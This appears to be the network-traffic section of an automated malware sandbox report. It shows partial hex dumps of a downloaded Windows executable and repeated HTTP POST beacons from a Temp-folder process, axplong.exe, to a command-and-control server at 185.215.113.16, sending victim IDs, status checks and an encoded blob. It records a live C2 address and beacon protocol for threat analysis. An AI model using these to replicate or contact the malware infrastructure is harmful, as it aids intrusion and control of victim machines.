                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 12 00 86 a4 f6 66 00 e8 05 00 a8 08 00 00 f0 00 27 00 0b 02 02 1f 00 36 00 00 00 ae 00 00 00 0a 00 00 b0 14 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 a0 06 00 00 06 00 00 6c d7 06 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 0c 10 00 00 00 f0 00 00 c0 45 00 00 00 80 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 68 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf'6@l` Ex@h(`.textX56`P`.dataP<@P.rdata`>@`@.pdataxP@0@.xdataT@0@.bss`.idataX@0.CRThj@@.tlsl@@.rsrcEFn@0/4@@B/19P@B/31)*J@B/45(*t@B/57@
                                                                                                                                                                Sep 27, 2024 17:42:03.636178970 CEST224INData Raw: 0c 00 00 00 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 37 30 00 00 00 00 00 e4 07 00 00 00 50 06 00 00 08 00 00 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 29 2f 00 00 00 60 06 00 00 30 00
                                                                                                                                                                Data Ascii: @@B/70P@B/81)/`0@B/92p@B
                                                                                                                                                                Sep 27, 2024 17:42:03.636214018 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Sep 27, 2024 17:42:03.636246920 CEST1236INData Raw: 49 39 dd 75 ce 4a 8d 44 25 f8 48 c7 00 00 00 00 00 48 89 2d 8b 8c 00 00 e8 d6 18 00 00 48 8b 05 df 57 00 00 48 8b 15 70 8c 00 00 8b 0d 7a 8c 00 00 48 8b 00 48 89 10 4c 8b 05 5d 8c 00 00 48 8b 15 5e 8c 00 00 e8 20 16 00 00 8b 0d 3f 8c 00 00 89 05
                                                                                                                                                                Data Ascii: I9uJD%HH-HWHpzHHL]H^ ?='u- H[^_]A\A]D$`fDH5WO-HWHW!-1Hf
                                                                                                                                                                Sep 27, 2024 17:42:03.636279106 CEST1236INData Raw: 00 00 5d c3 55 56 53 48 89 e5 48 89 4d 20 89 55 28 48 8b 45 20 48 8d 70 04 48 8b 45 20 4c 8d 58 08 48 8b 45 20 4c 8d 50 0c 8b 45 28 0f a2 41 89 d8 41 89 c1 48 8b 45 20 44 89 08 44 89 06 41 89 0b 41 89 12 90 5b 5e 5d c3 55 48 89 e5 48 83 ec 30 48
                                                                                                                                                                Data Ascii: ]UVSHHM U(HE HpHE LXHE LPE(AAHE DDAA[^]UHH0HEHEH0]UWHHH$HUnknown HProcessoHHHrHHHHHHD$ AAH
                                                                                                                                                                Sep 27, 2024 17:42:03.636312962 CEST1236INData Raw: c0 75 2d b9 02 00 00 00 48 8b 05 2c 33 00 00 ff d0 49 89 c1 41 b8 17 00 00 00 ba 01 00 00 00 48 8d 0d 13 45 00 00 e8 d8 23 00 00 e9 40 01 00 00 48 8d 45 c0 48 89 c2 48 8d 0d 13 45 00 00 e8 a0 23 00 00 48 8d 45 c0 48 c7 44 24 30 00 00 00 00 c7 44
                                                                                                                                                                Data Ascii: u-H,3IAHE#@HEHHE#HEHD$0D$(D$ AAHHHHHEHHtYHEHHotHD"RHO2IA
                                                                                                                                                                Sep 27, 2024 17:42:03.636348009 CEST896INData Raw: 89 c0 48 8d 15 d2 42 00 00 48 8b 4d 70 e8 c5 1e 00 00 eb 00 90 48 81 c4 d8 00 00 00 5f 5d c3 55 57 48 81 ec 98 04 00 00 48 8d ac 24 80 00 00 00 48 89 8d 30 04 00 00 48 8d 85 d0 03 00 00 48 89 c1 48 8b 05 9f 92 00 00 ff d0 c7 85 90 03 00 00 40 00
                                                                                                                                                                Data Ascii: HBHMpH_]UWHH$H0HHH@HHHHUnknown OSHHH HHHH6HHHHHUnknown HProcessoHH
                                                                                                                                                                Sep 27, 2024 17:42:03.636379957 CEST1236INData Raw: b9 00 00 00 00 41 b8 01 00 00 40 48 8b 4d 10 48 8b 05 a9 8e 00 00 ff d0 85 c0 75 07 b8 00 00 00 00 eb 65 8b 45 f4 89 c0 48 89 c1 e8 77 1b 00 00 48 89 45 f8 48 83 7d f8 00 75 07 b8 00 00 00 00 eb 46 48 8b 45 18 89 c1 48 8b 55 f8 48 8d 45 f4 48 89
                                                                                                                                                                Data Ascii: A@HMHueEHwHEH}uFHEHUHEHD$ IA@HMHTuHEH:HEH@]UHHPHMHUH}tHEuHD$0HD$(HEHD$ AAHMH
                                                                                                                                                                Sep 27, 2024 17:42:03.636411905 CEST1116INData Raw: 00 00 00 48 8b 05 09 26 00 00 ff d0 49 89 c1 41 b8 33 00 00 00 ba 01 00 00 00 48 8d 0d ea 3c 00 00 e8 b5 16 00 00 b8 01 00 00 00 e9 cb 00 00 00 b9 e9 fd 00 00 48 8b 05 cf 8a 00 00 ff d0 b9 e9 fd 00 00 48 8b 05 b9 8a 00 00 ff d0 e8 b2 ea ff ff 85
                                                                                                                                                                Data Ascii: H&IA3H<HHuH<RWH7tH7H<2kiHEH*HEHHHEHPHHtHH7HH`H
                                                                                                                                                                Sep 27, 2024 17:42:03.636450052 CEST1236INData Raw: 1f 84 00 00 00 00 00 e8 fb 0c 00 00 b8 01 00 00 00 48 83 c4 28 c3 90 56 53 48 83 ec 28 48 8b 05 43 3c 00 00 83 38 02 74 06 c7 00 02 00 00 00 83 fa 02 74 13 83 fa 01 74 40 b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 90 48 8d 1d 69 a1 00 00 48 8d 35 62
                                                                                                                                                                Data Ascii: H(VSH(HC<8ttt@H([^fHiH5bH9tHHtHH9uH([^H([^ff.f1HXHvHt,$L$ HL$ HT$(T$0\$8D$@HXff.
                                                                                                                                                                Sep 27, 2024 17:42:03.636497974 CEST1236INData Raw: 00 00 00 4c 39 e6 0f 83 79 ff ff ff 4c 8d 76 08 49 83 c4 07 4c 8b 2d d8 37 00 00 48 8d 7d a8 4d 29 f4 49 c1 ec 03 4e 8d 64 e6 08 eb 0a 66 0f 1f 44 00 00 49 83 c6 08 8b 4e 04 8b 06 41 b8 04 00 00 00 48 89 fa 4c 89 f6 4c 01 e9 03 01 89 45 a8 e8 0e
                                                                                                                                                                Data Ascii: L9yLvIL-7H}M)INdfDINAHLLEM9uGr1L%fH1rHDEtHPHHIAH(;r|NQVuVH8F-V/HL-7LuL9


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.449738185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:05.050443888 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 31
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 64 31 3d 31 30 30 30 33 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                Data Ascii: d1=1000359001&unit=246122658369
                                                                                                                                                                Sep 27, 2024 17:42:05.763284922 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:05 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.449740185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:05.885186911 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:06.584541082 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:06 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:06.586177111 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:06.810822010 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:06 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.449744185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:06.931915045 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:07.959161997 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:07 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:07.959450960 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:07 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:07.960340977 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:08.188471079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.449746185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:08.307951927 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:09.083329916 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:09.084280968 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:09.436841965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:09 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.449749185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:09.557512045 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:10.279664040 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:10 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:10.280847073 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:10.503495932 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:10 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.449752185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:10.619585037 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:11.326113939 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:11 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:11.327959061 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:11.552459955 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:11 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.449753185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:11.669706106 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:12.404237032 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:12 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:12.408096075 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:12.636272907 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:12 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.2.449756185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:12.745692015 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:13.506381989 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:13 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:13.507097960 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
